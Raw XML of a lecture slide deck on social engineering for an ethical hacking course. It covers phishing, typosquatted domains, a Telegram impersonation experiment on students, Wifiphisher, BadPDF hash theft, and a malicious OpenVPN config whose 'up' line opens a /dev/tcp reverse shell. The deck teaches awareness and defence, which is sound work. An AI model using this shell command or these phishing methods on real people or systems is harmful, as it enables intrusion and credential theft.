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61" r:id="rId3"/>
    <p:sldId id="276" r:id="rId4"/>
    <p:sldId id="275" r:id="rId5"/>
    <p:sldId id="281" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="258" r:id="rId9"/>
    <p:sldId id="283" r:id="rId10"/>
    <p:sldId id="284" r:id="rId11"/>
    <p:sldId id="262" r:id="rId12"/>
    <p:sldId id="285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72" r:id="rId21"/>
    <p:sldId id="273" r:id="rId22"/>
    <p:sldId id="287" r:id="rId23"/>
    <p:sldId id="288" r:id="rId24"/>
    <p:sldId id="279" r:id="rId25"/>
    <p:sldId id="292" r:id="rId26"/>
    <p:sldId id="291" r:id="rId27"/>
    <p:sldId id="282" r:id="rId28"/>
    <p:sldId id="293" r:id="rId29"/>
    <p:sldId id="278" r:id="rId30"/>
    <p:sldId id="277" r:id="rId31"/>
    <p:sldId id="295" r:id="rId32"/>
    <p:sldId id="296" r:id="rId33"/>
    <p:sldId id="294" r:id="rId34"/>
    <p:sldId id="297" r:id="rId35"/>
    <p:sldId id="263" r:id="rId36"/>
    <p:sldId id="271" r:id="rId37"/>
    <p:sldId id="264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02BC-97A6-429C-ACB7-A50DF066929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3757-AFDA-46FB-923C-DABFEBC8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03757-AFDA-46FB-923C-DABFEBC8F9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engineering_(security)" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://resources.infosecinstitute.com/topic/kali-linux-top-5-tools-for-social-engineering/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Phis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ityscorecard.com/blog/types-of-phishing-attacks-and-how-to-identify-them" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sysconf.io/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cybervie.com/blog/phishing-attack-using-kali-linu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3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GB" dirty="0"/>
              <a:t>Social engineering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465A0-CB06-49ED-BA5D-695AE9F8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1443"/>
            <a:ext cx="120396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C06D6-A3CA-490A-AFF1-0FF6072E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088"/>
            <a:ext cx="12192000" cy="26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2BE37-FD12-4A5F-A11F-6AC9E0AC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8" y="198036"/>
            <a:ext cx="10406621" cy="64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7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8A2F79-62CE-4166-8AD0-2CFE682B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8" y="0"/>
            <a:ext cx="1098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6144-DA62-432A-8D6D-17732B3C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Catch-all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5121-58C8-4D5A-8A9C-96CA70A4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https://support.google.com/a/answer/2685650</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>nonexistent1@yourdomain.ltd =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>catcher@yourdomain.ltd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nonexistent2@yourdomain.ltd =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>catcher@yourdomain.ltd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dsfghkjergkwergdhfgsdf@yourdomain.ltd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>catcher@yourdomain.ltd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7AF9-39AB-4660-9155-46D8A075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A33E-BB18-4E21-A660-759FED9D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Catch-all address was active for 6 months</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Catched</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 6000+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A085F-7E9D-4BE5-A302-03FAD938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8" y="4122140"/>
            <a:ext cx="4791558" cy="1679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99E20-5632-4635-B9FB-381CA00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78" y="4122140"/>
            <a:ext cx="5649042" cy="16790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8C6E6D-9E78-4CEA-93A7-CF05392AEC1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5542668" y="4650154"/>
            <a:ext cx="650697" cy="68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8384B-FF8A-472A-A031-784E5FD1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846494"/>
            <a:ext cx="94964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21BF3-79B6-461D-9280-AA46BC0D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232043"/>
            <a:ext cx="1034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4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31ED41-D371-4489-8B26-0A8A1F18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18" y="1103134"/>
            <a:ext cx="10316363" cy="42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3A915-0845-48F1-A938-35F50E6D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4" y="1338423"/>
            <a:ext cx="10964863" cy="41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2D460C-580C-4871-A1B3-1A186D32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34" y="600075"/>
            <a:ext cx="9182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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Improving cybersecurity awareness level of group</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Creating fake site to harvest credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Creating malicious PDF file to steal NTLM hashes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1F2EF-39C6-4DA0-A957-43799B25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75" y="532008"/>
            <a:ext cx="8677918" cy="54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8F22B-A9A6-4CD1-A46E-157A2D45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42962"/>
            <a:ext cx="9753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04134-3925-4A2D-BB7C-CC27DD43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89242"/>
            <a:ext cx="10839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AF38-7CE3-4678-AC06-81C41DA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3050"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>End of Experiment #0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/>
              <a:t>Moral: always check the recipient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C563-8FC6-4F0A-8DE6-45B2F366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C256-8B9B-489A-9990-1FE26118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Register in Telegram new account named “Saved Messages”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Write to anyone (victim), and directly delete the message</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wait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Later, when victim will try to save message, he can accidentally send it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AF38-7CE3-4678-AC06-81C41DA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3050"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>End of Experiment #1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/>
              <a:t>Moral: always check the recipient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C563-8FC6-4F0A-8DE6-45B2F366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C256-8B9B-489A-9990-1FE26118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Fake Telegram account similar to my real one was created (@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>manformkz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> instead of my real username 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In Telegram chat of my students, the message was posted from fake account (with request to text me their private email addresses)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Message was deleted after 5 minutes (in such short time - 3 victims)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The fake account was renamed to “Fake account” to show what happened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318B0-6AEA-4D3B-9040-394484C9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4589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289E2-622C-42C5-A072-510FAC92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85" y="-12843"/>
            <a:ext cx="35763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10DDE-5702-4FF2-81EB-AF55AD45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44" y="0"/>
            <a:ext cx="4156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AF38-7CE3-4678-AC06-81C41DA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3050"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>End of Experiment #2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/>
              <a:t>Moral: always check the recipient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514-1B8F-4E08-A77B-AD9507F0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BEA-AF72-4D80-8396-0C262CEE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https://github.com/trustedsec/social-engineer-toolkit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b="1" dirty="0"/>
              <a:t>The Social-Engineer Toolkit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack 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E082-D057-475D-AD8C-9DB7D9DD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2E60-A0C1-4741-B0BD-4E179C9E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context of information security, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>social engineering </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is the psychological manipulation of people into performing actions or divulging confidential information.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Types:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Qrshing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Smishing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just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405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E15B-2F67-4967-8BCE-03BD9492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Wifiphisher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C39B-B6F4-4247-8229-4BB05F28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https://github.com/wifiphisher/wifiphisher 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Wifiphisher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a rogue Access Point framework for conducting red team engagements or Wi-Fi security testing. Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wifiphisher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, penetration testers can easily achieve a man-in-the-middle position against wireless clients by performing targeted Wi-Fi association attacks.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3363008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E15B-2F67-4967-8BCE-03BD9492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Wifiphisher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.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C39B-B6F4-4247-8229-4BB05F28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choose any Wi-Fi access point</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tool will “jam” this point (de-authenticate all users) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wifiphisher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> creates a clone access point that doesn’t require a password to join</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Any person who connects to the evil twin-like open network is presented with a seemingly legitimate phishing page asking for the Wi-Fi password to download a firmware update, which is cited as the reason the Wi-Fi isn’t working</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291638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F090-384D-49B0-A405-48DF73FE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4370-3BE9-4084-AD5F-6AD070AC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http://www.jetmore.org/john/code/swaks/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b="1" dirty="0" err="1"/>
              <a:t>Swaks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> primary design goal is to be a flexible, scriptable, transaction-oriented SMTP test tool. It handles SMTP features and extensions such as TLS, authentication, and pipelining; multiple version of the SMTP protocol including SMTP, ESMTP, and LMTP; and multiple transport methods including UNIX-domain sockets, internet-domain sockets, and pipes to spawned processes.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13033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07FA-BA76-4E43-8A96-712F323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BadPDF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8FD1-8D8D-4C13-A54B-02B34AF6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https://medium.com/@riccardo.ancarani94/bad-pdf-smb-relay-50076046e15b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://github.com/deepzec/Bad-Pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BadPDF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attack allows an attacker to steal Net-NTLM credentials just opening a PDF file with a vulnerable reader (virtually every PDF reader).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Requirements: Active Directory, SMB Relay, Responder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Practice: https://tryhackme.com/room/postexploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1258659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208C-EC23-4DA8-BE13-A9C89A13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OpenVPN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0DA8-1581-488E-B37A-B8A0F44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https://medium.com/tenable-techblog/reverse-shell-from-an-openvpn-configuration-file-73fd8b1d38da</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OVPN file:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>remote 192.168.1.245</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>ifconfig 10.200.0.2 10.200.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>dev tun</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>script-security 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>up "/bin/bash -c '/bin/bash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> &gt; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>/192.168.1.218/8181 0&lt;&amp;1 2&gt;&amp;1&amp;'"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Clone any site with authorization form using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Setoolkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> and test it locally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Repeat yourself </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>BadPDF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/>
              <a:t>https://tryhackme.com/room/postexploit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https://en.wikipedia.org/wiki/Phishing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https://en.wikipedia.org/wiki/Social_engineering_(security)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.cybervie.com/blog/phishing-attack-using-kali-linux/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://sysconf.io/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://securityscorecard.com/blog/types-of-phishing-attacks-and-how-to-identify-them</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://resources.infosecinstitute.com/topic/kali-linux-top-5-tools-for-social-engineering/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66B5-3FC4-4C7B-AEB2-1E100AF5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51B5-9AB5-4518-8CF9-B30D7A59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Phishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a type of social engineering where an attacker sends a fraudulent (e.g., spoofed, fake, or otherwise deceptive) message designed to trick a human victim into revealing sensitive information to the attacker or to deploy malicious software on the victim's infrastructure like ransomware.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="354084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5AAF-47D7-4542-A20D-89A7326B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D6AC6-3F0D-42F3-A5A5-166E8502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Untargetted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Author of research: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3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7C5-2F31-44C7-8411-0A636A7F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 generator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C138-EBCC-498D-B284-A6D864728B27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1690688"/>
            <a:ext cx="10298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https://www.internetmarketingninjas.com/tools/free-tools/online-keyword-typo-generator/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5CCEB-85FD-4EFC-A884-CDF9112B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5" y="2770276"/>
            <a:ext cx="8619708" cy="36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7C5-2F31-44C7-8411-0A636A7F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domain checker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C138-EBCC-498D-B284-A6D864728B27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1690688"/>
            <a:ext cx="102989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https://ru.godaddy.com/domains/bulk-domain-search</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>https://www.namecheap.com/domains/bulk-domain-search/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>https://www.name.com/names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53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2DB31-6C50-498B-A432-918BC77F5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51"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="369292" y="2044557"/>
            <a:ext cx="11453415" cy="31854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7BDE63-D89E-40D1-B8DB-2A43E481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334303"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Results for outlook.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36377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7BDE63-D89E-40D1-B8DB-2A43E481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334303"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Results for rambler.ru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CF1FA-803C-418B-B68C-C4EF5A65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47"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="493159" y="2023812"/>
            <a:ext cx="11489141" cy="3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5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874</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>110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   Ethical hacking and Penetration Testing  Social engineering techniques</vt:lpstr>
      <vt:lpstr>Identifying the goals of lesson</vt:lpstr>
      <vt:lpstr>What is social engineering?</vt:lpstr>
      <vt:lpstr>What is phishing?</vt:lpstr>
      <vt:lpstr>Experiment #0</vt:lpstr>
      <vt:lpstr>Typo generator</vt:lpstr>
      <vt:lpstr>Bulk domain checker</vt:lpstr>
      <vt:lpstr>Results for outlook.com</vt:lpstr>
      <vt:lpstr>Results for rambler.ru</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Catch-all address</vt:lpstr>
      <vt:lpstr>Final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Experiment #0     Moral: always check the recipient </vt:lpstr>
      <vt:lpstr>Experiment #1</vt:lpstr>
      <vt:lpstr>End of Experiment #1     Moral: always check the recipient </vt:lpstr>
      <vt:lpstr>Experiment #2</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>End of Experiment #2     Moral: always check the recipient </vt:lpstr>
      <vt:lpstr>Setoolkit</vt:lpstr>
      <vt:lpstr>Wifiphisher</vt:lpstr>
      <vt:lpstr>Wifiphisher. How it works?</vt:lpstr>
      <vt:lpstr>Swaks</vt:lpstr>
      <vt:lpstr>BadPDF</vt:lpstr>
      <vt:lpstr>OpenVPN phishing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94</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-11-27T16:40:35Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-02-04T20:26:47Z</dcterms:modified>
</cp:coreProperties>
</file>